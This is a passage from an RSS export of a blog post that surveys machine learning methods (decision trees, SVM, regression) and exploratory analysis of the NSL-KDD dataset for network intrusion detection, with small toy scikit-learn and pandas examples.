<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[Mohammed]]></title><description><![CDATA[CYBERSECURITY, DevOps, & AI]]></description><link>https://blog.mohammedx.tech/</link><image><url>https://blog.mohammedx.tech/favicon.png</url><title>Mohammed</title><link>https://blog.mohammedx.tech/</link></image><generator>Ghost 5.75</generator><lastBuildDate>Thu, 07 May 2026 11:30:06 GMT</lastBuildDate><atom:link href="https://blog.mohammedx.tech/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[Machine Learning Models in Network Security]]></title><description><![CDATA[<h2 id="introduction"><strong>Introduction</strong></h2><p>Information system security is increasingly critical as digital transformation expands and cyber-attacks grow in complexity. While greater connectivity and widespread device usage have enabled unprecedented access to information and services, they have also introduced new vulnerabilities. 
Intrusion Detection Systems (IDS) play a central role in monitoring network traffic and</p>]]></description><link>https://blog.mohammedx.tech/machine-learning-models/</link><guid isPermaLink="false">694dd51337852e00013cb519</guid><category><![CDATA[AI]]></category><dc:creator><![CDATA[Mohammed Alshukaili]]></dc:creator><pubDate>Fri, 26 Dec 2025 00:41:33 GMT</pubDate><media:content url="https://blog.mohammedx.tech/content/images/2025/12/deep-learning-vs-machine-learning-t.jpg" medium="image"/><content:encoded><![CDATA[<h2 id="introduction"><strong>Introduction</strong></h2><img src="https://blog.mohammedx.tech/content/images/2025/12/deep-learning-vs-machine-learning-t.jpg" alt="Machine Learning Models in Network Security"><p>Information system security is increasingly critical as digital transformation expands and cyber-attacks grow in complexity. While greater connectivity and widespread device usage have enabled unprecedented access to information and services, they have also introduced new vulnerabilities. Intrusion Detection Systems (IDS) play a central role in monitoring network traffic and identifying suspicious activity, but traditional IDS struggle to keep pace with modern cyber threats.</p><p>Artificial Intelligence (AI) and Machine Learning (ML) offer promising solutions to enhance intrusion detection by improving adaptability and detection accuracy. This study explores the application of ML techniques to IDS using the widely adopted NSL-KDD dataset, a benchmark for evaluating intrusion detection models. By analyzing different ML approaches and their effectiveness in detecting various network attacks, this research aims to contribute to the development of more robust and flexible cybersecurity defenses aligned with current industry trends.</p><hr><h2 id="problem-description"><strong>Problem Description</strong></h2><p>The rising number of cyberattacks poses a significant threat to network security worldwide.
Although traditional intrusion detection systems (IDS) have been widely used to identify threats, they often suffer from high false positives, limited adaptability to new attack types, and high maintenance costs. These limitations highlight the need for more flexible and intelligent detection approaches.</p><p>Machine learning (ML) offers a promising solution by learning patterns and anomalies from data. However, its effectiveness depends on data quality, feature selection, and robust algorithm choice. Despite being an improvement over KDD&#x2019;99, the NSL-KDD dataset still faces challenges such as class imbalance, outdated attack samples, and limited representation of emerging threats.</p><p>This research applies multiple ML techniques to the NSL-KDD dataset to identify effective models for intrusion detection, with the aim of improving IDS accuracy, efficiency, and adaptability against evolving cyber threats.</p><hr><h2 id="scope"><strong>Scope</strong></h2><p>The objective of this project is to examine the use of machine learning techniques for intrusion detection using the NSL-KDD dataset. The study focuses on exploratory data analysis to understand dataset structure and intrusion characteristics, and on evaluating several classification models, including Decision Trees, Random Forests, Support Vector Machines (SVM), and Neural Networks.</p><p>Model performance is assessed using accuracy, precision, recall, and F1 score to identify the most effective approaches for detecting different types of intrusions. The research also acknowledges the limitations of the NSL-KDD dataset, particularly its representativeness of real-world traffic and the evolving nature of cyber threats. 
While deployment in real network environments is outside the project scope, the study aims to provide valuable theoretical insights into the strengths and limitations of machine learning&#x2013;based intrusion detection systems.</p><hr><h2 id="research-questions"><strong>Research Questions</strong></h2><p><strong>Main Question</strong>: How can Artificial Intelligence and Machine Learning be leveraged to improve the detection of network intrusions and enhance cybersecurity defences using the NSL-KDD dataset?</p><p><strong>Sub Questions</strong>:</p><ul><li>What are the fundamental AI and ML concepts and techniques essential for developing an effective intrusion detection system?</li><li>How does Exploratory Data Analysis (EDA) contribute to understanding the NSL-KDD dataset, and what insights can it provide to inform the development of a more accurate intrusion detection model?</li><li>What are some effective machine learning models for intrusion detection in cybersecurity, and how do they compare in terms of accuracy, performance, and scalability when applied to the NSL-KDD dataset?</li></ul><hr><h2 id="question-1"><strong>Question 1</strong></h2><p><strong>What are the fundamental AI and ML concepts and techniques essential for developing an effective intrusion detection system?</strong></p><p><strong>Artificial Intelligence (AI):</strong> Artificial intelligence (AI) is the capacity of a computer or computer-controlled robot to carry out tasks typically performed by intelligent beings. The phrase is commonly used to describe the effort to build systems with human-like abilities in areas such as reasoning, meaning-finding, generalization, and learning from experience. (Copeland, 2024)</p><p><strong>Machine Learning (ML):</strong> Machine learning is a subset of artificial intelligence (AI). It powers image recognition systems, self-driving cars, and products like Amazon&#x2019;s Alexa.
This involves using data and algorithms to emulate the way humans learn, enabling machines to make accurate predictions, classifications, or data-driven insights. Machine learning is about teaching a computer by feeding it large amounts of data, enabling it to guess outcomes, spot patterns, or sort data. There are three kinds of machine learning: supervised, unsupervised, and reinforcement learning. (Staff, 2023)</p><p><strong>Supervised learning:</strong> Supervised learning is the type of machine learning expected to be the most used in businesses, according to Gartner, a business consulting company. This method works by providing the model with past data: the machine receives both the inputs and the expected outputs, then learns to make its future outputs as accurate as possible. Methods like neural networks, decision trees, and linear regression are common in supervised learning. In supervised learning, the machine is guided, or &quot;supervised,&quot; during its learning: it is given labelled data as the outcome it needs to learn, and other data as input features to work with. (Staff, 2023)</p><p><strong>Unsupervised learning:</strong> Unsupervised learning, unlike supervised learning, doesn&apos;t rely on labelled training sets. Instead, it allows the machine to discover less apparent patterns in the data by itself. Algorithms commonly used in unsupervised learning include Hidden Markov models, k-means clustering, hierarchical clustering, and Gaussian mixture models. Predictive modelling is one of the many uses for unsupervised learning. It is frequently used for clustering, which groups objects according to their characteristics, and for association, which finds the rules that connect these groups. Organizing inventory based on manufacturing or sales metrics, classifying customers based on their purchasing patterns, and identifying connections within customer data (such as patterns in the purchases of goods) are a few real-world examples.
(Staff, 2023)</p><p><strong>Reinforcement learning:</strong> One kind of machine learning that closely resembles how people learn is reinforcement learning. This method involves an algorithm, or &quot;agent,&quot; that learns through interactions with its surroundings and the provision of positive or negative rewards. Q-learning, deep adversarial networks, and temporal difference are important algorithms in this field. For example, in a game where we want a car to reach the finish line as soon as possible, we would let the car explore the field by itself, reward it when it goes in the correct direction, and take rewards away when it goes in the wrong direction. This lets the model learn the correct behaviour without being given any labelled data. (Staff, 2023)</p><p>Several machine learning models can be especially useful when analyzing Zeek logs for anomaly detection. Zeek logs are a rich source of network data, and the choice of model depends on the specific aspects of network traffic that are being captured. Here are some models that are commonly used:</p><p><strong>Decision Trees:</strong> Decision trees are a type of supervised machine learning algorithm used for classification and regression tasks. They make decisions based on asking a series of questions.
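</p><p>As a minimal sketch of this question-asking process, the following (assuming scikit-learn is available, with invented toy connection records) trains a small tree and classifies two new connections:</p>

```python
# Minimal decision-tree sketch on invented "connection" records:
# features are [duration, src_bytes]; label 0 = normal, 1 = attack.
from sklearn.tree import DecisionTreeClassifier

X = [[1, 200], [2, 300], [1, 250],           # short, small transfers
     [50, 90000], [60, 80000], [55, 85000]]  # long, very large transfers
y = [0, 0, 0, 1, 1, 1]

clf = DecisionTreeClassifier(random_state=0).fit(X, y)

# The tree reaches a leaf by asking a series of threshold questions.
print(clf.predict([[3, 220], [58, 90000]]))  # -> [0 1]
```

<p>With cleanly separable toy data like this, a single threshold question is enough to reach a leaf; real traffic needs deeper trees.</p><p>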
<strong>Structure of a decision tree:</strong></p><ul><li>Root Node: This is where the tree starts.</li><li>Splitting: Dividing a node into two or more sub-nodes based on certain conditions.</li><li>Decision/Internal Node: After the first split, each sub-node becomes a decision (internal) node and can be split further.</li><li>Leaf Node: The final nodes, which have no further splits.</li></ul><p>The diagram (Figure 1, Structure of a Decision Tree) visualizes each component of a decision tree, showing how data is segmented at successive levels based on different conditions until a decision is reached at the leaf nodes.</p><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="1596" height="724" srcset="https://blog.mohammedx.tech/content/images/size/w600/2025/12/image.png 600w, https://blog.mohammedx.tech/content/images/size/w1000/2025/12/image.png 1000w, https://blog.mohammedx.tech/content/images/2025/12/image.png 1596w" sizes="(min-width: 720px) 720px"></figure><p><strong>How to choose the best attribute at each node?</strong></p><p>There are many techniques for choosing the best attribute at each node in decision tree models. Information gain and Gini impurity are two widely used methods. These techniques assess the effectiveness of each potential split by how well it separates the data into classes. To understand how these methods work, it is essential to start with the concept of entropy. Entropy is a measure of the impurity in a set of data; it helps to determine how a decision tree should split the data at each node.</p><p><strong>Numpy</strong></p><p>In order to start working with machine learning models, I need to learn NumPy. NumPy is a Python library that simplifies working with arrays. Here are some of the things that I learned about NumPy:</p><ul><li><code>numpy.where</code>: Find the positions of values in an array that match a condition.</li><li><code>numpy.ones((x, x))</code>: Generate an x-by-x matrix of ones.</li><li><code>numpy.zeros((6, 6))</code>: Create a 6x6 matrix of zeros.</li><li><code>numpy.max(x)</code>: Get the maximum value in an array.</li><li><code>x.transpose()</code>: Change a row vector into a column vector.</li><li><code>numpy.sum(x)</code>: Get the sum of the elements of x.</li></ul><p>(NumPy: The Absolute Basics for Beginners &#x2014; NumPy v1.26 Manual, 2023)</p><p><strong>Tensorflow</strong></p><p>TensorFlow is an open-source machine learning library that provides flexible tools for building and training models to derive insights and predictions from data. I will go through some of the basics in order to start designing my own models to analyze Zeek traffic.</p><p>This is how to create a tensor with multiple float values: <code>x = tf.Variable(initial_value=[10., 20., 30.], name=&apos;float_tensor&apos;)</code></p><p>In order to add a new dimension to a tensor, we can wrap the values in another pair of brackets: <code>x = tf.Variable([[10, 20, 30]], dtype=tf.float32)</code></p><p>Move x to 3 dimensions: <code>x = tf.Variable([[[10, 20, 30]]], dtype=tf.float32, name=&apos;tf_float_variable&apos;)</code></p><p>Let&#x2019;s print the value of x:</p><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-1.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="1614" height="224" srcset="https://blog.mohammedx.tech/content/images/size/w600/2025/12/image-1.png 600w, https://blog.mohammedx.tech/content/images/size/w1000/2025/12/image-1.png 1000w, https://blog.mohammedx.tech/content/images/size/w1600/2025/12/image-1.png 1600w, https://blog.mohammedx.tech/content/images/2025/12/image-1.png 1614w" sizes="(min-width: 720px) 720px"></figure><p>This is a &apos;scalar&apos; or &apos;rank-0&apos; tensor.
A scalar consists of just one value and does not have any &apos;axes&apos;.</p><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-2.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="762" height="234" srcset="https://blog.mohammedx.tech/content/images/size/w600/2025/12/image-2.png 600w, https://blog.mohammedx.tech/content/images/2025/12/image-2.png 762w" sizes="(min-width: 720px) 720px"></figure><p>&quot;A &apos;vector&apos; or &apos;rank-1&apos; tensor is similar to a list of values. It has one axis:&quot;</p><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-3.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="1034" height="262" srcset="https://blog.mohammedx.tech/content/images/size/w600/2025/12/image-3.png 600w, https://blog.mohammedx.tech/content/images/size/w1000/2025/12/image-3.png 1000w, https://blog.mohammedx.tech/content/images/2025/12/image-3.png 1034w" sizes="(min-width: 720px) 720px"></figure><p>A &apos;matrix&apos; or &apos;rank-2&apos; tensor is characterized by having two axes:</p><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-4.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="1196" height="492" srcset="https://blog.mohammedx.tech/content/images/size/w600/2025/12/image-4.png 600w, https://blog.mohammedx.tech/content/images/size/w1000/2025/12/image-4.png 1000w, https://blog.mohammedx.tech/content/images/2025/12/image-4.png 1196w" sizes="(min-width: 720px) 720px"></figure><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-5.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="1536" height="400" 
srcset="https://blog.mohammedx.tech/content/images/size/w600/2025/12/image-5.png 600w, https://blog.mohammedx.tech/content/images/size/w1000/2025/12/image-5.png 1000w, https://blog.mohammedx.tech/content/images/2025/12/image-5.png 1536w" sizes="(min-width: 720px) 720px"></figure><p>A tensor can be converted into a NumPy array using either <code>np.array</code> or the <code>tensor.numpy()</code> method:</p><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-6.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="774" height="318" srcset="https://blog.mohammedx.tech/content/images/size/w600/2025/12/image-6.png 600w, https://blog.mohammedx.tech/content/images/2025/12/image-6.png 774w" sizes="(min-width: 720px) 720px"></figure><p>Some of the previous images contain the word &quot;shape&quot;. What is a shape? Tensors have shapes:</p><ul><li>Shape: The number of elements along each axis of a tensor.</li><li>Rank: The total number of axes in a tensor. Scalars are rank 0, vectors rank 1, and matrices rank 2.</li><li>Axis or Dimension: A specific dimension within a tensor.</li><li>Size: The total number of items in the tensor, obtained by multiplying the elements of the shape vector.</li></ul><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-7.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="1606" height="784" srcset="https://blog.mohammedx.tech/content/images/size/w600/2025/12/image-7.png 600w, https://blog.mohammedx.tech/content/images/size/w1000/2025/12/image-7.png 1000w, https://blog.mohammedx.tech/content/images/size/w1600/2025/12/image-7.png 1600w, https://blog.mohammedx.tech/content/images/2025/12/image-7.png 1606w" sizes="(min-width: 720px) 720px"></figure><p><code>tf.zeros</code> can be used to create tensors filled with zeros in the provided shape.</p><p><strong>More about shapes:</strong></p><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-8.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="1574" height="316" srcset="https://blog.mohammedx.tech/content/images/size/w600/2025/12/image-8.png 600w, https://blog.mohammedx.tech/content/images/size/w1000/2025/12/image-8.png 1000w, https://blog.mohammedx.tech/content/images/2025/12/image-8.png 1574w" sizes="(min-width: 720px) 720px"></figure><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-9.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="1224" height="266" srcset="https://blog.mohammedx.tech/content/images/size/w600/2025/12/image-9.png 600w, https://blog.mohammedx.tech/content/images/size/w1000/2025/12/image-9.png 1000w, https://blog.mohammedx.tech/content/images/2025/12/image-9.png 1224w" sizes="(min-width: 720px) 720px"></figure><p>A tensor can be reshaped into a different shape.
The <code>tf.reshape</code> function is efficient, as it doesn&apos;t require duplicating the original data.</p><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-10.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="1000" height="464" srcset="https://blog.mohammedx.tech/content/images/size/w600/2025/12/image-10.png 600w, https://blog.mohammedx.tech/content/images/2025/12/image-10.png 1000w" sizes="(min-width: 720px) 720px"></figure><p><strong>Linear Regression:</strong> Linear regression is a fundamental algorithm in data science. It models the relationship between two variables under the assumption of a linear link between the independent and dependent variables. Its goal is to find the best-fit line that minimizes the total squared differences between the predicted and actual values.</p><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-11.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="1678" height="1382" srcset="https://blog.mohammedx.tech/content/images/size/w600/2025/12/image-11.png 600w, https://blog.mohammedx.tech/content/images/size/w1000/2025/12/image-11.png 1000w, https://blog.mohammedx.tech/content/images/size/w1600/2025/12/image-11.png 1600w, https://blog.mohammedx.tech/content/images/2025/12/image-11.png 1678w" sizes="(min-width: 720px) 720px"></figure><p>The blue dots are the training data provided to the model. Based on this data, the model fits a line that minimizes the distance between the line and the dots. The line is then used to predict new values. As you can see, the line was created from the training data, and when we predict new values, they are placed on the line (green dots).
Here is the code for this output:</p><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-12.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="1794" height="1400" srcset="https://blog.mohammedx.tech/content/images/size/w600/2025/12/image-12.png 600w, https://blog.mohammedx.tech/content/images/size/w1000/2025/12/image-12.png 1000w, https://blog.mohammedx.tech/content/images/size/w1600/2025/12/image-12.png 1600w, https://blog.mohammedx.tech/content/images/2025/12/image-12.png 1794w" sizes="(min-width: 720px) 720px"></figure><p><strong>Support Vector Machines:</strong> Support vector machines (SVMs) are a popular supervised ML method used for classification and outlier detection. One of their advantages is that they work in both low- and high-dimensional spaces. SVM focuses on identifying a hyperplane that optimally separates two classes. SVM is similar to logistic regression, but it is important to highlight that their approaches differ fundamentally. Which hyperplane does it select? Millions of hyperplanes could classify the objects into two categories, so how does SVM know which is best?</p><p>SVM picks the best hyperplane by finding the one with the maximum margin, that is, the greatest distance to the nearest data points of the two classes.
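</p><p>A minimal sketch of this margin-maximizing behaviour, assuming scikit-learn and using two invented, well-separated groups of points:</p>

```python
# Sketch of margin maximisation: a linear SVM fitted on two invented,
# well-separated groups of 2-D points.
import numpy as np
from sklearn.svm import SVC

X = np.array([[1.0, 1.0], [1.5, 1.2], [1.2, 0.8],
              [4.0, 4.0], [4.5, 4.2], [4.2, 3.8]])
y = np.array([0, 0, 0, 1, 1, 1])

model = SVC(kernel="linear").fit(X, y)

# The support vectors are the points nearest the separating hyperplane;
# they alone determine its position and the width of the margin.
print(model.support_vectors_)
print(model.predict([[1.1, 1.0], [4.3, 4.1]]))  # -> [0 1]
```

<p>The fitted model exposes its support vectors directly, which makes the margin idea easy to inspect.</p><p>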
SVM algorithms can be categorized into two types:</p><ul><li>Linear SVM: Used when the dataset is linearly separable, meaning the data points can be classified into two categories with a single straight line.</li><li>Non-Linear SVM: Used when the dataset is not linearly separable, meaning the data points cannot be divided into two classes with a straight line in a two-dimensional view.</li></ul><p>The main terms in SVM are:</p><ul><li>Support Vectors: The data points closest to the hyperplane in an SVM model. The position of the hyperplane is mainly determined by these points.</li><li>Margin: The gap between the hyperplane and the nearest data points (the support vectors).</li></ul><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-13.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="1474" height="970" srcset="https://blog.mohammedx.tech/content/images/size/w600/2025/12/image-13.png 600w, https://blog.mohammedx.tech/content/images/size/w1000/2025/12/image-13.png 1000w, https://blog.mohammedx.tech/content/images/2025/12/image-13.png 1474w" sizes="(min-width: 720px) 720px"></figure><p><strong>Bias</strong>: This refers to systematic error in a machine learning algorithm. A high-bias model is more likely to give consistently wrong predictions.</p><p><strong>Variance</strong>: High variance means the algorithm is overly sensitive to the particular dataset it is trained on: it performs well on some datasets and poorly on others.</p><p><strong>Cross validation</strong>: This helps to choose the best machine learning method for a specific purpose. It allows us to compare different machine learning methods and get a sense of how well they will work. When choosing an ML method, we typically train on 80% of the dataset and use the remaining 20% to test accuracy.
However, how do we know which piece of data to use for training and which for testing? Cross validation solves this problem by rotating through the dataset, training and testing on every piece, and reporting which method fits best.</p><p><strong>Kernel trick</strong>: This transforms the dataset into a higher dimension where a hyperplane can effectively separate the classes.</p><p>Now, to understand SVM better, I will write simple Python code that uses SVM.</p><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-14.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="1718" height="1634" srcset="https://blog.mohammedx.tech/content/images/size/w600/2025/12/image-14.png 600w, https://blog.mohammedx.tech/content/images/size/w1000/2025/12/image-14.png 1000w, https://blog.mohammedx.tech/content/images/size/w1600/2025/12/image-14.png 1600w, https://blog.mohammedx.tech/content/images/2025/12/image-14.png 1718w" sizes="(min-width: 720px) 720px"></figure><p>This is a Jupyter notebook that implements a very basic SVM model. The plot shows that the model creates a hyperplane based on the distance between the closest data points.</p><p>Now, I want the model to classify (predict) new data points.
I added a new array that contains new data points that I want the model to classify:</p><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-15.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="1602" height="1494" srcset="https://blog.mohammedx.tech/content/images/size/w600/2025/12/image-15.png 600w, https://blog.mohammedx.tech/content/images/size/w1000/2025/12/image-15.png 1000w, https://blog.mohammedx.tech/content/images/size/w1600/2025/12/image-15.png 1600w, https://blog.mohammedx.tech/content/images/2025/12/image-15.png 1602w" sizes="(min-width: 720px) 720px"></figure><p>As seen above, the model predicts the class of each new data point and places it with the correct class.</p><p><strong>Conclusion</strong></p><p>Understanding the nature of entropy and information gain, as illustrated through the decision tree model, allows cyber security professionals to implement effective anomaly detection systems. With the right approach to training and the application of concepts like entropy in supervised learning, machine learning models can be trained to recognize and flag unusual patterns in network logs that could indicate a security threat. Furthermore, integrating machine learning with large datasets would enhance the capability to automate the detection of anomalies in network traffic.
By employing models such as decision trees, support vector machines, and others, organizations can effectively respond to potential cyber security incidents.</p><hr><h2 id="question-2"><strong>Question 2</strong></h2><p><strong>How does Exploratory Data Analysis (EDA) contribute to understanding the NSL-KDD dataset, and what insights can it provide to inform the development of a more accurate intrusion detection model?</strong></p><hr><p><strong>What is EDA?</strong></p><p>Data scientists use exploratory data analysis (EDA) to examine datasets and summarize their key features, frequently with data visualization techniques. EDA helps determine the best methods for processing data sources to extract the necessary insights, making it easier for data scientists to find patterns, spot anomalies, test hypotheses, or confirm assumptions. EDA&apos;s primary goal is to assist in examining data before drawing any conclusions. It can help locate glaring errors, better understand data patterns, spot outliers or unusual occurrences, and discover interesting correlations between the variables. Exploratory analysis is a tool data scientists can use to make sure the results they generate are reliable and relevant to the intended business objectives. EDA also benefits stakeholders by confirming that they are asking the right questions. Standard deviations, categorical variables, and confidence intervals are among the topics that EDA can assist with.
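</p><p>A small sketch of these EDA steps with pandas, using a handful of invented NSL-KDD-style rows (real work would load the full dataset):</p>

```python
# EDA sketch with pandas on a few invented NSL-KDD-style rows.
import pandas as pd

df = pd.DataFrame({
    "protocol_type": ["tcp", "tcp", "udp", "icmp", "tcp"],
    "src_bytes":     [181, 239, 105, 1032, 0],
    "attack":        ["normal", "normal", "normal", "smurf", "neptune"],
})

print(df.describe())                   # summary statistics (numeric columns)
print(df["attack"].value_counts())     # class balance: a key EDA question here
print(df.groupby("protocol_type")["src_bytes"].mean())  # per-protocol pattern
```

<p>Even on toy rows, <code>describe()</code>, <code>value_counts()</code>, and <code>groupby()</code> surface summary statistics, class balance, and per-protocol patterns.</p><p>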
The features of EDA can be applied to more complex data analysis or modeling, such as machine learning, after it is finished and conclusions have been drawn.</p><hr><p><strong>Exploratory data analysis tools</strong></p><p>With EDA tools, you can perform a range of statistical procedures and methods, such as:</p><ul><li>Dimension reduction and clustering methods that help to visualize high-dimensional data with many different variables.</li><li>Visualizations of individual attributes from the raw data set combined with summary statistics.</li><li>Multivariate visualizations, useful for understanding and mapping the relationships between various data fields.</li><li>K-means clustering, an unsupervised learning technique in which data points are grouped into K groups (the total number of clusters) according to their distance from each group&apos;s centroid. The data points that fall into the same category are those closest to a given centroid. Pattern recognition, image compression, and market segmentation are three common applications of K-means clustering.</li><li>Predictive models, like linear regression, which use data and statistics to forecast outcomes.</li></ul><hr><p><strong>Understanding the NSL-KDD Dataset</strong></p><p><strong>Dataset Overview</strong></p><p>Tavallaee et al. (2009) state that the NSL-KDD dataset is a publicly accessible resource created from the earlier KDD Cup99 dataset. A statistical analysis of the Cup99 dataset revealed important problems that significantly impact intrusion detection accuracy and led to inaccurate assessments of Automated Intrusion Detection Systems (AIDS). The primary issue with the KDD dataset, as analyzed by Tavallaee et al. (2009), is the substantial number of duplicate packets present. Their analysis of both the training and testing sets revealed that approximately 78% and 75% of network packets, respectively, were duplicates.
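</p><p>The deduplication step that produced NSL-KDD can be sketched with pandas (toy rows with invented values):</p>

```python
# Sketch of the duplicate-removal idea behind NSL-KDD: drop_duplicates
# keeps a single copy of each repeated record (rows invented).
import pandas as pd

records = pd.DataFrame({
    "protocol_type": ["tcp", "tcp", "tcp", "udp"],
    "src_bytes":     [181, 181, 181, 105],
    "label":         ["normal", "normal", "normal", "teardrop"],
})

deduped = records.drop_duplicates()
print(len(records), "->", len(deduped))  # 4 -> 2
```

<p><code>drop_duplicates</code> keeps one copy of each repeated record, which is essentially what removing the roughly 78% duplicate training packets achieved.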
</p><p>Because there are many duplicate instances in the training set, machine learning techniques may be biased toward typical cases and unable to learn from the irregular instances, which frequently pose more serious risks to computer systems. Tavallaee et al. (2009) removed duplicate records from the KDD Cup&apos;99 dataset to create the NSL-KDD dataset, which addresses the issues found in its predecessor. There are 125,973 records in the NSL-KDD training dataset and 22,544 records in the test dataset. Because of its manageable size, the NSL-KDD dataset can be used for research purposes without the need for random sampling, which has resulted in consistent and comparable results across studies. The NSL-KDD dataset has 41 attributes and includes 22 training intrusion attacks. Of these, the 19 attributes that describe the nature of connections within the same host and the 21 attributes that relate to the characteristics of the connection together provide a full set of features for intrusion detection research. (Saylor Academy, 2023)</p><hr><p><strong>Feature Composition</strong></p><p>To address the &quot;Feature Composition&quot; of the NSL-KDD dataset for intrusion detection systems, we dive into the types of features included in the dataset, their data types, and their relevance to identifying potential security threats. Here is a closer look at the NSL-KDD dataset&apos;s feature composition:</p><p><strong>Types of Features in NSL-KDD</strong></p><p>The NSL-KDD dataset includes 42 features (columns), including a label feature that categorizes each connection as either normal or an attack.
The types of attacks are also subdivided into four categories:</p><ul><li>DoS (Denial of Service)</li><li>R2L (Remote to Local)</li><li>U2R (User to Root)</li><li>Probe</li></ul><p>All the features in the dataset can be categorized into three main types:</p><ul><li>Basic Features: These encompass attributes extracted directly from packet headers, such as connection duration, protocol type, service requested, and flag status, representing core network connection qualities easily identifiable from network traffic.</li><li>Content Features: These analyze packet payloads for anomalies, such as failed login attempts, and are crucial for detecting U2R and R2L attacks involving abnormal data transmissions.</li><li>Traffic Features: These track connections where the same host is trying to connect to the same service, which can be helpful when trying to detect DoS attacks.</li></ul><hr><p><strong>Data Types of Features</strong></p><ul><li>Numerical Features: Most features in the dataset are numerical.</li><li>Categorical Features: Some features are categorical, representing types of protocols (e.g., tcp, udp, icmp), services (e.g., http, ftp, telnet), and network connection status (e.g., SF, S1, REJ). These features often require preprocessing to be used effectively in machine learning models.</li></ul><hr><p><strong>Identifying Key Features</strong></p><p>The dataset contains over 40 columns, making it important to choose only the key features that are relevant to determining whether a particular connection is malicious or benign.</p><p>Using my knowledge of cybersecurity, I carefully looked over each column in the dataset and chose a few features that seemed relevant to my objective.
The selected features and their descriptions are listed below:</p><ul><li>&#x2018;duration&#x2019;: The length of the connection.</li><li>&#x2018;protocol_type&#x2019;: The protocol used, such as tcp or udp.</li><li>&#x2018;service&#x2019;: The network service, such as http, telnet, or ssh.</li><li>&#x2018;flag&#x2019;: The status of the connection, such as S0 or S1.</li><li>&#x2018;src_bytes&#x2019;: The number of data bytes from source to destination.</li><li>&#x2018;dst_bytes&#x2019;: The number of data bytes from destination to source.</li><li>&#x2018;logged_in&#x2019;: A binary column where 1 means a successful login and 0 otherwise.</li><li>&#x2018;is_host_login&#x2019;: A binary column where 1 means the login belongs to the &quot;host&quot; list and 0 otherwise.</li><li>&#x2018;is_guest_login&#x2019;: 1 if the login is a &quot;guest&quot; login and 0 otherwise.</li><li>&#x2018;attack&#x2019;: A column that states whether the connection is normal or a specific type of attack. Since many attack types are listed, I will collapse them all into a single value (attack) to make this a binary column (normal &amp; attack).</li></ul><hr><p><strong>Identifying Key Features using Feature Selection</strong></p><p>Hans mentioned that it is good to use my experience to pick the important features. However, he advised me to also implement a feature selection method to find the best possible features in my dataset. First, I will use a mutual information classifier to evaluate feature importance. 
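</p><p>A minimal sketch of that plan with scikit-learn, on synthetic data with column names borrowed from the dataset (the actual code is in the screenshots below):</p>

```python
from functools import partial

import numpy as np
import pandas as pd
from sklearn.feature_selection import SelectKBest, mutual_info_classif

rng = np.random.default_rng(0)
n = 500
# Synthetic stand-in: 'src_bytes' carries the signal, 'duration' is noise.
X = pd.DataFrame({
    "src_bytes": rng.integers(0, 2, n) * 1000 + rng.integers(0, 50, n),
    "duration": rng.normal(size=n),
})
y = (X["src_bytes"] > 500).astype(int)  # 1 = attack, 0 = normal

# Score features by mutual information, then keep the single best one.
mi = partial(mutual_info_classif, random_state=0)
selector = SelectKBest(mi, k=1).fit(X, y)
print(list(X.columns[selector.get_support()]))  # → ['src_bytes']
```

<p>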
